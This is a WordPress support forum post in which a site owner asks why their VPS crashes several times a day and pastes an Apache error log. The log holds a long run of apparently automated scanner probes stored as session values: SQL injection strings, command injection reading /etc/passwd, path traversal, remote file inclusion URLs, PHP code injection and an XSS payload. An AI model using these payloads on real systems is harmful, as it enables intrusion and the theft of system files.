WP take down my VPS
-
Hi all,
First offcourse thats not WP that take down my VPS.
However i need help because i need to reboot my VPS hosted at Godaddy 2 or 3 times each day.
I have read my VPS error_log and i have found a sequence of logic errors that take down my VPS.
First, IP xx.xxx.xxx do “50.000” requests like that (Example):
[Fri Apr 11 07:42:26 2014] [warn] [client [my vps ip]] mod_fcgid: can’t apply process slot for /var/www/cgi-bin/cgi_wrapper/cgi_wrapperThen, i got that:
[Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_ [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_expires_-1 or 20=20','_wp_session_-1 or 20=20','_wp_session_expires_ [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: cat /etc/passwd','_wp_session_ [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: cat /etc/passwd','_wp_session_expires_response.write(9412876*9067279)','_wp_session_response.write(9412876*9067279)','_wp_session_expires_'+response.write(9412876*9067279)+'','_wp_session_'+response.write(9412876*9067279)+'','_wp_session_expires_ [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_ [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: SomeCustomInjectedHeader:injected_by_wvs','_wp_session_expires_-1' or '63'='63','_wp_session_-1' or '63'='63','_wp_session_expires_<code>cat /etc/passwd</code>','_wp_session_<code>cat /etc/passwd</code>','_wp_session_expires_-1' or '63'='0','_wp_session_-1' or '63'='0','_wp_session_expires_|cat /etc/passwd#','_wp_session_|cat /etc/passwd#','_wp_session_expires_-1" or "21"="21','_wp_session_-1" or "21"="21','_wp_session_expires_'|'ld','_wp_session_'|'ld','_wp_session_expires_../../../../../../../../../../etc/passwd','_wp_session_../../../../../../../../../../etc/passwd','_wp_session_expires_-1" or "21"="0','_wp_session_-1" or "21"="0','_wp_session_expires_"|"ld','_wp_session_"|"ld','_wp_session_expires_..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2','_wp_session_..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2','_wp_session_expires_;cat /etc/passwd;','_wp_session_;cat /etc/passwd;','_wp_session_expires_';cat /etc/passwd;'','_wp_session_';cat /etc/passwd;'','_wp_session_expires_";cat /etc/passwd;"','_wp_session_";cat /etc/passwd;"','_wp_session_expires_','_wp_session_','_wp_session_expires_&dir','_wp_session_&dir','_wp_session_expires_'&dir&'','_wp_session_'&dir&'','_wp_session_expires_${99738+99276}','_wp_session_${99738+99276}','_wp_session_expires_"&dir&"','_wp_session_"&dir&"','_wp_session_expires_268435455','_wp_session_268435455','_wp_session_expires_|dir','_wp_session_|dir','_wp_session_expires_'|dir','_wp_session_'|dir','_wp_session_expires_..','_wp_session_..','_wp_session_expires_http://some-inexistent-website.acu/some_inex','_wp_session_http://some-inexistent-website.acu/some_inex','_wp_session_expires_"|dir','_wp_session_"|dir','_wp_session_expires_1e309','_wp_session_1e309','_wp_session_expires_1some_inexistent_file_with_long_name%00.jpg','_wp_session_1some_inexistent_file_with_long_name%00.jpg','_wp_session_expires_'"'")','_wp_session_'"'")','_wp_session_expires_http://testasp.vulnweb.com/t/fit.txt?%00.jpg','_wp_session_http://testasp.vulnweb.com/t/fit.txt?%00.jpg','_wp_session_expires_aENmdDRPN0NOUElSWDFyT2RnYWQ2T3lVWEhnTjVXT0dO','_wp_session_aENmdDRPN0NOUElSWDFyT2RnYWQ2T3lVWEhnTjVXT0dO','_wp_session_expires_)','_wp_session_)','_wp_session_expires_!(()&&!|*|*|','_wp_session_!(()&&!|*|*|','_wp_session_expires_'"()','_wp_session_'"()','_wp_session_expires_^(#$!@#$)(()))******','_wp_session_^(#$!@#$)(()))******','_wp_session_expires_;print(md5(acunetix_wvs_security_test));','_wp_session_;print(md5(acunetix_wvs_security_test));','_wp_session_expires_';print(md5(acunetix_wvs_security_test));$a=','_wp_session_';print(md5(acunetix_wvs_security_test));$a=','_wp_session_expires_";print(md5(acunetix_wvs_security_test));$a=','_wp_session_";print(md5(acunetix_wvs_security_test));$a=','_wp_session_expires_${@print(md5(acunetix_wvs_security_test))}','_wp_session_${@print(md5(acunetix_wvs_security_test))}','_wp_session_expires_http://testasp.vulnweb.com/t/xss.html?%00.jp','_wp_session_http://testasp.vulnweb.com/t/xss.html?%00.jp','_wp_session_expires_))))))))))))))))))))))))))))))))))))))))))))','_wp_session_))))))))))))))))))))))))))))))))))))))))))))','_wp_session_expires_//www.acunetix.tst','_wp_session_//www.acunetix.tst','_wp_session_expires_1'"','_wp_session_1'"','_wp_session_expires_1','_wp_session_1','_wp_session_expires_<?xml version="1.0" encoding="utf-8"?> [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: <!DO','_wp_session_<?xml version="1.0" encoding="utf-8"?> [Sat Apr 12 16:56:00 2014] [warn] [client [my vps ip]] mod_fcgid: stderr: <!DO','_wp_session_expires_'"','_wp_session_'"','_wp_session_expires_@@TA21D','_wp_session_@@TA21D','_wp_session_expires_JyI=','_wp_session_JyI=','_wp_session_expires_<!--','_wp_session_<!--','_wp_session_expires_'"()&%1<ScRiPt >prompt(912200)</ScRiPt>','_wp_session_'"()&%1<ScRiPt >prompt(912200)</ScRiPt>','_wp_session_expires_OTg0MDE2','_wp_session_OTg0MDE2','_wp_session_expires_Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRj','_wp_session_Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRj','_wp_session_expires_/../..//../..//../..//../..//../..//etc/pass','_wp_session_/../..//../..//../..//../..//../..//etc/pass','_wp_session_expires_.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd','_wp_session_.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd','_wp_session_expires_/etc/passwd','_wp_session_/etc/passwd','_wp_session_expires_../..//../..//../..//../..//../..//../..//..','_wp_session_../..//../..//../..//../..//../..//../..//..','_wp_session_expires_../.../.././../.../.././../.../.././../.../.','_wp_session_../.../.././../.../.././../.../.././../.../.','_wp_session_expires_file:///etc/passwd','_wp_session_file:///etc/passwd','_wp_session_expires_/../../../../../../../etc/passwd','_wp_session_/../../../../../../../etc/passwd','_wp_session_expires_../../../../../../../../../../windows/win.in','_wp_session_../../../../../../../../../../windows/win.in','_wp_session_expires_../../../../../../../../../../boot.ini','_wp_session_../../../../../../../../../../boot.ini','_wp_session_expires_1040c441aefb1d4c3de6745882bbd1bf','_wp_session_1040c441aefb1d4c3de6745882bbd1bf','_wp_session_expires_3b514dcf0b8f3d41060f98968c2e4b9f','_wp_session_3b514dcf0b8f3d41060f98968c2e4b9f','_wp_session_expires_28b58e5c7d4e9cb26bef03d4305ed1e6','_wp_session_28b58e5c7d4e9cb26bef03d4305ed1e6','_wp_session_expires_a2838510d593b03804cfb9237699f266','_wp_session_a2838510d593b03804cfb9237699f266','_wp_session_expires_9667df63f985d00d047b5f5a81782b96','_wp_session_9667df63f985d00d047b5f5a81782b96','_wp_session_expires_7fc33ee8f7460b9ba5b2a55ee937fb33','_wp_session_7fc33ee8f7460b9ba5b2a55ee937fb33','_wp_session_expires_400faac9ae119b07581bc8b8dd8036f7','_wp_session_400faac9ae119b07581bc8b8dd8036f7','_wp_session_expires_3a7a96ea7e9e3ff23de3f7213efc6237','_wp_session_3a7a96ea7e9e3ff23de3f7213efc6237','_wp_session_expires_3a5f26b067230a6be869b1ef79653177','_wp_session_3a5f26b067230a6be869b1ef79653177','_wp_session_expires_55692e09b109af861ada416c98d930f1','_wp_session_55692e09b109af861ada416c98d930f1','_wp_session_expires_d158770a1dc8fdea41bf4f584dcf7c2c','_wp_session_d158770a1dc8fdea41bf4f584dcf7c2c','_wp_session_expires_980720e7e432417092c87e78913be85a','_wp_session_980720e7e432417092c87e78913be85a') feita por do_action_ref_array, call_user_func_array, wp_session_cleanupMy question is: How can i prevent this? Its really annoiyng reboot my VPS 2 or more times each day.
Its a Bot Attack ? Its a Plugin Problem ? If is a Plugin issue, Plugins can take down one VPS ?
Thanks for the posible feedback and Help =)
Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
The topic ‘WP take down my VPS’ is closed to new replies.